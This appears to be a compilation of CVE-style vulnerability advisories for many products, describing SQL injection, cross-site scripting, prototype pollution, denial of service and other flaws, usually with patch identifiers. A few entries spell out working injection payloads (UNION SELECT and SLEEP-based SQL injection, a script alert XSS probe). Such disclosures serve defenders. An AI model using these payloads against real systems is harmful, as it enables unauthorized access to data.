A vulnerability classified as critical has been found in SourceCodester Prison Management System 1.0. Affected is an unknown function of the file /admin/?page=inmates/view_inmate of the component Inmate Handler. The manipulation of the argument id with the input 1%27%20and%201=2%20union%20select%201,user(),3,4,5,6,7,8,9,0,database(),2,3,4,5,6,7,8,9,0,1,2,3,4--+ leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /pms/admin/visits/view_visit.php of the component Visit Handler. The manipulation of the argument id with the input 2%27and%201=2%20union%20select%201,2,3,4,5,6,7,user(),database()--+ leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in FileCloud. Affected is an unknown function of the component NTFS Handler. The manipulation leads to improper access controls. It is possible to launch the attack remotely. Upgrading to version 21.3.5.18513 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-201960.
A vulnerability classified as critical has been found in Home Clean Services Management System 1.0. This affects an unknown part of admin/login.php. The manipulation of the argument username with the input admin%'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(5)))JPeh)/**/AND/**/'frfq%'='frfq leads to sql injection. It is possible to initiate the attack remotely but it requires authentication. Exploit details have been disclosed to the public.
A vulnerability classified as problematic has been found in SourceCodester Royale Event Management System 1.0. Affected is an unknown function of the file /royal_event/companyprofile.php. The manipulation of the argument companyname/regno/companyaddress/companyemail leads to cross site scripting. It is possible to launch the attack remotely. VDB-195786 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Royale Event Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /royal_event/userregister.php. The manipulation leads to improper authentication. The attack may be initiated remotely. The identifier VDB-195785 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester One Church Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /one_church/userregister.php. The manipulation leads to authentication bypass. The attack can be launched remotely.
A vulnerability was found in SourceCodester College Website Management System 1.0. It has been classified as critical. Affected is the file /cwms/admin/?page=articles/view_article/. The manipulation of the argument id with the input ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc with an unknown input leads to sql injection. It is possible to launch the attack remotely and without authentication.
In the Linux kernel, the following vulnerability has been resolved: btrfs: fix re-dirty process of tree-log nodes There is a report of a transaction abort of -EAGAIN with the following script. #!/bin/sh for d in sda sdb; do mkfs.btrfs -d single -m single -f /dev/\${d} done mount /dev/sda /mnt/test mount /dev/sdb /mnt/scratch for dir in test scratch; do echo 3 &gt;/proc/sys/vm/drop_caches fio --directory=/mnt/\${dir} --name=fio.\${dir} --rw=read --size=50G --bs=64m \ --numjobs=$(nproc) --time_based --ramp_time=5 --runtime=480 \ --group_reporting |&amp; tee /dev/shm/fio.\${dir} echo 3 &gt;/proc/sys/vm/drop_caches done for d in sda sdb; do umount /dev/\${d} done The stack trace is shown in below. [3310.967991] BTRFS: error (device sda) in btrfs_commit_transaction:2341: errno=-11 unknown (Error while writing out transaction) [3310.968060] BTRFS info (device sda): forced readonly [3310.968064] BTRFS warning (device sda): Skipping commit of aborted transaction. [3310.968065] ------------[ cut here ]------------ [3310.968066] BTRFS: Transaction aborted (error -11) [3310.968074] WARNING: CPU: 14 PID: 1684 at fs/btrfs/transaction.c:1946 btrfs_commit_transaction.cold+0x209/0x2c8 [3310.968131] CPU: 14 PID: 1684 Comm: fio Not tainted 5.14.10-300.fc35.x86_64 #1 [3310.968135] Hardware name: DIAWAY Tartu/Tartu, BIOS V2.01.B10 04/08/2021 [3310.968137] RIP: 0010:btrfs_commit_transaction.cold+0x209/0x2c8 [3310.968144] RSP: 0018:ffffb284ce393e10 EFLAGS: 00010282 [3310.968147] RAX: 0000000000000026 RBX: ffff973f147b0f60 RCX: 0000000000000027 [3310.968149] RDX: ffff974ecf098a08 RSI: 0000000000000001 RDI: ffff974ecf098a00 [3310.968150] RBP: ffff973f147b0f08 R08: 0000000000000000 R09: ffffb284ce393c48 [3310.968151] R10: ffffb284ce393c40 R11: ffffffff84f47468 R12: ffff973f101bfc00 [3310.968153] R13: ffff971f20cf2000 R14: 00000000fffffff5 R15: ffff973f147b0e58 [3310.968154] FS: 00007efe65468740(0000) GS:ffff974ecf080000(0000) knlGS:0000000000000000 [3310.968157] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [3310.968158] CR2: 000055691bcbe260 CR3: 000000105cfa4001 CR4: 0000000000770ee0 [3310.968160] PKRU: 55555554 [3310.968161] Call Trace: [3310.968167] ? dput+0xd4/0x300 [3310.968174] btrfs_sync_file+0x3f1/0x490 [3310.968180] __x64_sys_fsync+0x33/0x60 [3310.968185] do_syscall_64+0x3b/0x90 [3310.968190] entry_SYSCALL_64_after_hwframe+0x44/0xae [3310.968194] RIP: 0033:0x7efe6557329b [3310.968200] RSP: 002b:00007ffe0236ebc0 EFLAGS: 00000293 ORIG_RAX: 000000000000004a [3310.968203] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007efe6557329b [3310.968204] RDX: 0000000000000000 RSI: 00007efe58d77010 RDI: 0000000000000006 [3310.968205] RBP: 0000000004000000 R08: 0000000000000000 R09: 00007efe58d77010 [3310.968207] R10: 0000000016cacc0c R11: 0000000000000293 R12: 00007efe5ce95980 [3310.968208] R13: 0000000000000000 R14: 00007efe6447c790 R15: 0000000c80000000 [3310.968212] ---[ end trace 1a346f4d3c0d96ba ]--- [3310.968214] BTRFS: error (device sda) in cleanup_transaction:1946: errno=-11 unknown The abort occurs because of a write hole while writing out freeing tree nodes of a tree-log tree. For zoned btrfs, we re-dirty a freed tree node to ensure btrfs can write the region and does not leave a hole on write on a zoned device. The current code fails to re-dirty a node when the tree-log tree's depth is greater or equal to 2. That leads to a transaction abort with -EAGAIN. Fix the issue by properly re-dirtying a node on walking up the tree.
In the Linux kernel, the following vulnerability has been resolved: bpf: Use correct permission flag for mixed signed bounds arithmetic We forbid adding unknown scalars with mixed signed bounds due to the spectre v1 masking mitigation. Hence this also needs bypass_spec_v1 flag instead of allow_ptr_leaks.
A vulnerability, which was classified as problematic, has been found in dbartholomae lambda-middleware frameguard up to 1.0.4. Affected by this issue is some unknown functionality of the file packages/json-deserializer/src/JsonDeserializer.ts of the component JSON Mime-Type Handler. The manipulation leads to inefficient regular expression complexity. Upgrading to version 1.1.0 is able to address this issue. The patch is identified as f689404d830cbc1edd6a1018d3334ff5f44dc6a6. It is recommended to upgrade the affected component. VDB-253406 is the identifier assigned to this vulnerability.
A vulnerability was found in Karjasoft Sami HTTP Server 2.0. It has been classified as problematic. Affected is an unknown function of the component HTTP HEAD Rrequest Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250836.
A vulnerability was found in PCMan FTP Server 2.0.7. It has been classified as problematic. This affects an unknown part of the component USER Command Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250719.
A vulnerability classified as problematic has been found in msyk FMDataAPI up to 22. Affected is an unknown function of the file FMDataAPI_Sample.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 23 is able to address this issue. The patch is identified as 3bd1709a8f7b1720529bf5dfc9855ad609f436cf. It is recommended to upgrade the affected component. VDB-244494 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Ortus Solutions ColdBox Elixir 3.1.6. This affects an unknown part of the file src/defaultConfig.js of the component ENV Variable Handler. The manipulation leads to information disclosure. Upgrading to version 3.1.7 is able to address this issue. The identifier of the patch is a3aa62daea2e44c76d08d1eac63768cd928cd69e. It is recommended to upgrade the affected component. The identifier VDB-244485 was assigned to this vulnerability.
OX App Suite through 7.10.5 allows XSS via an unknown system message in Chat.
The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 3.1.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
A vulnerability was found in ITRS Group monitor-ninja up to 2021.11.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file modules/reports/models/scheduled_reports.php. The manipulation leads to sql injection. Upgrading to version 2021.11.30 is able to address this issue. The name of the patch is 6da9080faec9bca1ca5342386c0421dca0a6c0cc. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230084.
A vulnerability, which was classified as critical, has been found in json-logic-js 2.0.0. Affected by this issue is some unknown functionality of the file logic.js. The manipulation leads to command injection. Upgrading to version 2.0.1 is able to address this issue. The patch is identified as c1dd82f5b15d8a553bb7a0cfa841ab8a11a9c227. It is recommended to upgrade the affected component. VDB-222266 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in NHN TOAST UI Chart 4.1.4. This issue affects some unknown processing of the component Legend Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 4.2.0 is able to address this issue. The identifier of the patch is 1a3f455d17df379e11b501bb5ba1dd1bcc41d63e. It is recommended to upgrade the affected component. The identifier VDB-221501 was assigned to this vulnerability.
A vulnerability has been found in NYUCCL psiTurk up to 3.2.0 and classified as critical. This vulnerability affects unknown code of the file psiturk/experiment.py. The manipulation of the argument mode leads to improper neutralization of special elements used in a template engine. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2.1 is able to address this issue. The name of the patch is 47787e15cecd66f2aa87687bf852ae0194a4335f. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-219676.
A vulnerability classified as problematic was found in Talend Open Studio for MDM. This vulnerability affects unknown code of the component XML Handler. The manipulation leads to xml external entity reference. The patch is identified as 31d442b9fb1d518128fd18f6e4d54e06c3d67793. It is recommended to apply a patch to fix this issue. VDB-217666 is the identifier assigned to this vulnerability.
A vulnerability was found in 01-Scripts 01-Artikelsystem. It has been classified as problematic. Affected is an unknown function of the file 01article.php. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. It is possible to launch the attack remotely. The patch is identified as ae849b347a58c2cb1be38d04bbe56fc883d5d84a. It is recommended to apply a patch to fix this issue. VDB-217662 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in 01-Scripts 01ACP. This issue affects some unknown processing. The manipulation of the argument $_SERVER['SCRIPT_NAME'] leads to cross site scripting. The attack may be initiated remotely. The identifier of the patch is a16eb7da46ed22bc61067c212635394f2571d3c4. It is recommended to apply a patch to fix this issue. The identifier VDB-217649 was assigned to this vulnerability.
A vulnerability was found in WebPA up to 3.1.1. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. Upgrading to version 3.1.2 is able to address this issue. The identifier of the patch is 8836c4f549181e885a68e0e7ca561fdbcbd04bf0. It is recommended to upgrade the affected component. The identifier VDB-217637 was assigned to this vulnerability.
A vulnerability was found in Yomguithereal Baobab up to 2.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be launched remotely. Upgrading to version 2.6.1 is able to address this issue. The patch is named c56639532a923d9a1600fb863ec7551b188b5d19. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217627.
A vulnerability classified as problematic has been found in cronvel terminal-kit up to 2.1.7. Affected is an unknown function. The manipulation leads to inefficient regular expression complexity. Upgrading to version 2.1.8 is able to address this issue. The name of the patch is a2e446cc3927b559d0281683feb9b821e83b758c. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217620.
A vulnerability was found in eprintsug ulcc-core. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file cgi/toolbox/toolbox. The manipulation of the argument password leads to command injection. The attack can be launched remotely. The patch is named 811edaae81eb044891594f00062a828f51b22cb1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217447.
A vulnerability was found in slackero phpwcms up to 1.9.26. It has been classified as problematic. This affects an unknown part of the component SVG File Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.9.27 is able to address this issue. The patch is named b39db9c7ad3800f319195ff0e26a0981395b1c54. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217419.
A vulnerability was found in slackero phpwcms up to 1.9.26 and classified as critical. Affected by this issue is some unknown functionality. The manipulation of the argument $phpwcms['db_prepend'] leads to sql injection. The attack may be launched remotely. Upgrading to version 1.9.27 is able to address this issue. The patch is identified as 77dafb6a8cc1015f0777daeb5792f43beef77a9d. It is recommended to upgrade the affected component. VDB-217418 is the identifier assigned to this vulnerability.
A vulnerability has been found in trampgeek jobe up to 1.6.4 and classified as problematic. This vulnerability affects the function runs_post of the file application/controllers/Restapi.php. The manipulation of the argument sourcefilename leads to an unknown weakness. Upgrading to version 1.6.5 is able to address this issue. The patch is identified as 694da5013dbecc8d30dd83e2a83e78faadf93771. It is recommended to upgrade the affected component. VDB-217174 is the identifier assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in gnuboard youngcart5 up to 5.4.5.1. Affected is an unknown function of the file adm/menu_list_update.php. The manipulation of the argument me_link leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 5.4.5.2 is able to address this issue. The name of the patch is 70daa537adfa47b87af12d85f1e698fff01785ff. It is recommended to upgrade the affected component. VDB-216954 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability was found in OpenMRS Admin UI Module up to 1.4.x. It has been rated as problematic. This issue affects some unknown processing of the file omod/src/main/webapp/pages/metadata/privileges/privilege.gsp of the component Manage Privilege Page. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.5.0 is able to address this issue. The name of the patch is 4f8565425b7c74128dec9ca46dfbb9a3c1c24911. It is recommended to upgrade the affected component. The identifier VDB-216917 was assigned to this vulnerability.
A vulnerability was found in OpenMRS Admin UI Module up to 1.5.x. It has been declared as problematic. This vulnerability affects unknown code of the file omod/src/main/webapp/pages/metadata/locations/location.gsp. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.6.0 is able to address this issue. The name of the patch is a7eefb5f69f6c50a3bffcb138bb8ea57cb41a9b6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216916.
A vulnerability was found in DHBW Fallstudie. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file app/config/passport.js of the component Login. The manipulation of the argument id/email leads to sql injection. The name of the patch is 5c13c6a972ef4c07c5f35b417916e0598af9e123. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216907.
A vulnerability was found in OpenMRS openmrs-module-referenceapplication up to 2.11.x. It has been rated as problematic. This issue affects some unknown processing of the file omod/src/main/webapp/pages/userApp.gsp. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.12.0 is able to address this issue. The name of the patch is 35f81901a4cb925747a9615b8706f5079d2196a1. It is recommended to upgrade the affected component. The identifier VDB-216881 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in ReFirm Labs binwalk up to 2.3.2. Affected is an unknown function of the file src/binwalk/modules/extractor.py of the component Archive Extraction Handler. The manipulation leads to symlink following. It is possible to launch the attack remotely. Upgrading to version 2.3.3 is able to address this issue. The name of the patch is fa0c0bd59b8588814756942fe4cb5452e76c1dcd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216876.
A vulnerability classified as problematic was found in Nagios NCPA. This vulnerability affects unknown code of the file agent/listener/templates/tail.html. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 2.4.0 is able to address this issue. The name of the patch is 5abbcd7aa26e0fc815e6b2b0ffe1c15ef3e8fab5. It is recommended to upgrade the affected component. VDB-216874 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in OpenMRS HTML Form Entry UI Framework Integration Module up to 1.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is 811990972ea07649ae33c4b56c61c3b520895f07. It is recommended to upgrade the affected component. The identifier VDB-216873 was assigned to this vulnerability.
A vulnerability was found in FreeBPX voicemail. It has been rated as problematic. Affected by this issue is some unknown functionality of the file views/ssettings.php of the component Settings Handler. The manipulation of the argument key leads to cross site scripting. The attack may be launched remotely. Upgrading to version 14.0.6.25 is able to address this issue. The name of the patch is ffce4882016076acd16fe0f676246905aa3cb2f3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216872.
A vulnerability was found in FreePBX voicemail. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file page.voicemail.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 14.0.6.25 is able to address this issue. The name of the patch is 12e1469ef9208eda9d8955206e78345949236ee6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216871.
A vulnerability was found in Brave UX for-the-badge and classified as critical. Affected by this issue is some unknown functionality of the file .github/workflows/combine-prs.yml. The manipulation leads to os command injection. The name of the patch is 55b5a234c0fab935df5fb08365bc8fe9c37cf46b. It is recommended to apply a patch to fix this issue. VDB-216842 is the identifier assigned to this vulnerability.
A vulnerability was found in styler_praat_scripts. It has been classified as problematic. Affected is an unknown function of the file file_segmenter.praat of the component Slash Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The name of the patch is 0cad44aa4a3eb0ecdba071c10eaff16023d8b35f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216780.
A vulnerability has been found in Starcounter-Jack JSON-Patch up to 3.1.0 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.1 is able to address this issue. The name of the patch is 7ad6af41eabb2d799f698740a91284d762c955c9. It is recommended to upgrade the affected component. VDB-216778 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in cronvel tree-kit up to 0.6.x. This affects an unknown part. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). Upgrading to version 0.7.0 is able to address this issue. The name of the patch is a63f559c50d70e8cb2eaae670dec25d1dbc4afcd. It is recommended to upgrade the affected component. The identifier VDB-216765 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in katlings pyambic-pentameter. Affected is an unknown function. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is 974f21aa1b2527ef39c8afe1a5060548217deca8. It is recommended to apply a patch to fix this issue. VDB-216498 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in sileht bird-lg. This issue affects some unknown processing of the file templates/layout.html. The manipulation of the argument request_args leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ef6b32c527478fefe7a4436e10b96ee28ed5b308. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216479.
A vulnerability classified as problematic has been found in studygolang. This affects an unknown part of the file static/js/topics.js. The manipulation of the argument contentHtml leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 0fb30f9640bd5fa0cae58922eac6c00bb1a94391. It is recommended to apply a patch to fix this issue. The identifier VDB-216477 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in phpRedisAdmin up to 1.17.3. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.18.0 is able to address this issue. The name of the patch is b9039adbb264c81333328faa9575ecf8e0d2be94. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216471.
A vulnerability classified as problematic was found in tad_discuss. Affected by this vulnerability is an unknown functionality. The manipulation of the argument DiscussTitle leads to cross site scripting. The attack can be launched remotely. The name of the patch is af94d034ff8db642d05fd8788179eab05f433958. It is recommended to apply a patch to fix this issue. The identifier VDB-216469 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Webdetails cpf up to 9.5.0.0-80. Affected is an unknown function of the file core/src/main/java/pt/webdetails/cpf/packager/DependenciesPackage.java. The manipulation of the argument baseUrl leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 9.5.0.0-81 is able to address this issue. The name of the patch is 3bff900d228e8cae3af256b447c5d15bdb03c174. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216468.
A vulnerability was found in siwapp-ror. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 924d16008cfcc09356c87db01848e45290cb58ca. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216467.
A vulnerability was found in LinkedIn dustjs up to 2.x and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is ddb6523832465d38c9d80189e9de60519ac307c3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216464.
A vulnerability was found in oils-js. It has been declared as critical. This vulnerability affects unknown code of the file core/Web.js. The manipulation leads to open redirect. The attack can be initiated remotely. The name of the patch is fad8fbae824a7d367dacb90d56cb02c5cb999d42. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216268.
** DISPUTED ** A vulnerability was found in whohas. It has been rated as problematic. This issue affects some unknown processing of the component Package Information Handler. The manipulation leads to cleartext transmission of sensitive information. The attack may be initiated remotely. The real existence of this vulnerability is still doubted at the moment. The name of the patch is 667c3e2e9178f15c23d7918b5db25cd0792c8472. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216251. NOTE: Most sources redirect to the encrypted site which limits the possibilities of an attack.
A vulnerability was found in ctrlo lenio. It has been declared as problematic. This vulnerability affects unknown code of the file views/task.tt of the component Task Handler. The manipulation of the argument site.org.name/check.name/task.tasktype.name/task.name leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 698c5fa465169d6f23c6a41ca4b1fc9a7869013a. It is recommended to apply a patch to fix this issue. VDB-216214 is the identifier assigned to this vulnerability.
A vulnerability was found in ctrlo lenio. It has been classified as problematic. This affects an unknown part of the file views/index.tt. The manipulation of the argument task.name/task.site.org.name leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is e1646d5cd0a2fbab9eb505196dd2ca1c9e4cdd97. It is recommended to apply a patch to fix this issue. The identifier VDB-216213 was assigned to this vulnerability.
A vulnerability was found in ctrlo lenio and classified as problematic. Affected by this issue is some unknown functionality of the file views/contractor.tt. The manipulation of the argument contractor.name leads to cross site scripting. The attack may be launched remotely. The name of the patch is e1646d5cd0a2fbab9eb505196dd2ca1c9e4cdd97. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216212.
A vulnerability has been found in ctrlo lenio and classified as problematic. Affected by this vulnerability is an unknown functionality of the file views/layouts/main.tt of the component Notice Handler. The manipulation of the argument notice.notice.text leads to cross site scripting. The attack can be launched remotely. The name of the patch is aa300555343c1c081951fcb68bfb6852fbba7451. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216211.
A vulnerability, which was classified as problematic, was found in ctrlo lenio. Affected is an unknown function in the library lib/Lenio.pm of the component Ticket Handler. The manipulation of the argument site_id leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 7a1f90bd2a0ce95b8338ec0926902da975ec64d9. It is recommended to apply a patch to fix this issue. VDB-216210 is the identifier assigned to this vulnerability.
A vulnerability was found in xml-conduit. It has been classified as problematic. Affected is an unknown function of the file xml-conduit/src/Text/XML/Stream/Parse.hs of the component DOCTYPE Entity Expansion Handler. The manipulation leads to infinite loop. It is possible to launch the attack remotely. Upgrading to version 1.9.1.0 is able to address this issue. The name of the patch is 4be1021791dcdee8b164d239433a2043dc0939ea. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216204.
A vulnerability was found in kapetan dns up to 6.1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file DNS/Protocol/Request.cs. The manipulation leads to insufficient entropy in prng. The attack may be launched remotely. Upgrading to version 7.0.0 is able to address this issue. The name of the patch is cf7105aa2aae90d6656088fe5a8ee1d5730773b6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216188.
A vulnerability has been found in OWASP NodeGoat and classified as problematic. This vulnerability affects unknown code of the file app/routes/research.js of the component Query Parameter Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The name of the patch is 4a4d1db74c63fb4ff8d366551c3af006c25ead12. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216184.
A vulnerability was found in roxlukas LMeve and classified as critical. Affected by this issue is some unknown functionality of the component Login Page. The manipulation of the argument X-Forwarded-For leads to sql injection. The attack may be launched remotely. The name of the patch is 29e1ead3bb1c1fad53b77dfc14534496421c5b5d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216176.
A vulnerability classified as problematic has been found in chbrown rfc6902. This affects an unknown part of the file pointer.ts. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The exploit has been disclosed to the public and may be used. The name of the patch is c006ce9faa43d31edb34924f1df7b79c137096cf. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215883.
A vulnerability classified as problematic has been found in yikes-inc-easy-mailchimp-extender Plugin up to 6.8.5. This affects an unknown part of the file admin/partials/ajax/add_field_to_form.php. The manipulation of the argument field_name/merge_tag/field_type/list_id leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 6.8.6 is able to address this issue. The name of the patch is 3662c6593aa1bb4286781214891d26de2e947695. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215307.
A vulnerability was found in Sapido BR270n, BRC76n, GR297 and RB1732 and classified as critical. Affected by this issue is some unknown functionality of the file ip/syscmd.htm. The manipulation leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214592.
A vulnerability classified as problematic has been found in Zoo Management System 1.0. Affected is an unknown function of the file admin/manage-ticket.php. The manipulation with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely.
Puma is a HTTP 1.1 server for Ruby/Rack applications. Prior to versions 5.5.1 and 4.3.9, using `puma` with a proxy which forwards HTTP header values which contain the LF character could allow HTTP request smugggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. The only proxy which has this behavior, as far as the Puma team is aware of, is Apache Traffic Server. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This vulnerability was patched in Puma 5.5.1 and 4.3.9. As a workaround, do not use Apache Traffic Server with `puma`.
IBM QRadar SIEM 7.3, 7.4, and 7.5 is vulnerable to local privilege escalation if this could be combined with other unknown vulnerabilities then privilege escalation could be performed. IBM X-Force ID: 216111.
The Bluetooth Classic implementation on Bluetrum AB5301A devices with unknown firmware versions does not properly handle the reception of oversized DM1 LMP packets while no other BT connections are active, allowing attackers in radio range to prevent new BT connections (disabling the AB5301A inquiry and page scan procedures) via a crafted LMP packet. The user needs to manually perform a power cycle (restart) of the device to restore BT connectivity.
A Missing Authentication for Critical Function vulnerability in B. Braun SpaceCom2 prior to 012U000062 allows a remote attacker to reconfigure the device from an unknown source because of lack of authentication on proprietary networking commands.
** DISPUTED ** GNOME Evolution through 3.38.3 produces a "Valid signature" message for an unknown identifier on a previously trusted key because Evolution does not retrieve enough information from the GnuPG API. NOTE: third parties dispute the significance of this issue, and dispute whether Evolution is the best place to change this behavior.
An issue was discovered in Ruby through 2.6.7, 2.7.x through 2.7.3, and 3.x through 3.0.1. Net::IMAP does not raise an exception when StartTLS fails with an an unknown response, which might allow man-in-the-middle attackers to bypass the TLS protections by leveraging a network position between the client and the registry to block the StartTLS command, aka a "StartTLS stripping attack."
The project received a report that all versions of Apache OpenOffice through 4.1.8 can open non-http(s) hyperlinks. The problem has existed since about 2006 and the issue is also in 4.1.9. If the link is specifically crafted this could lead to untrusted code execution. It is always best practice to be careful opening documents from unknown and unverified sources. The mitigation in Apache OpenOffice 4.1.10 (unreleased) assures that a security warning is displayed giving the user the option of continuing to open the hyperlink.
A use-after-free vulnerability was found via testing, and traced to an out-of-date Cairo library. Updating the library resolved the issue, and may have remediated other, unknown security vulnerabilities as well. This vulnerability affects Firefox &lt; 90.
A Format String vulnerablity exists in TRENDnet TEW-755AP 1.11B03, TEW-755AP2KAC 1.11B03, TEW-821DAP2KAC 1.11B03, and TEW-825DAP 1.11B03, which could let a remote malicious user cause a denial of service due to a logic bug at address 0x40dcd0 when calling fprintf with "%s: key len = %d, too long\n" format. The two variables seem to be put in the wrong order. The vulnerability could be triggered by sending the POST request to apply_cgi with a long and unknown key in the request body.
Null Pointer Dereference vulnerability exists in TRENDnet TEW-755AP 1.11B03, TEW-755AP2KAC 1.11B03, TEW-821DAP2KAC 1.11B03, and TEW-825DAP 1.11B03 by sending the POST request to apply_cgi with an unknown action name.
An issue was discovered in Envoy through 1.71.1. There is a remotely exploitable NULL pointer dereference and crash in TLS when an unknown TLS alert code is received.
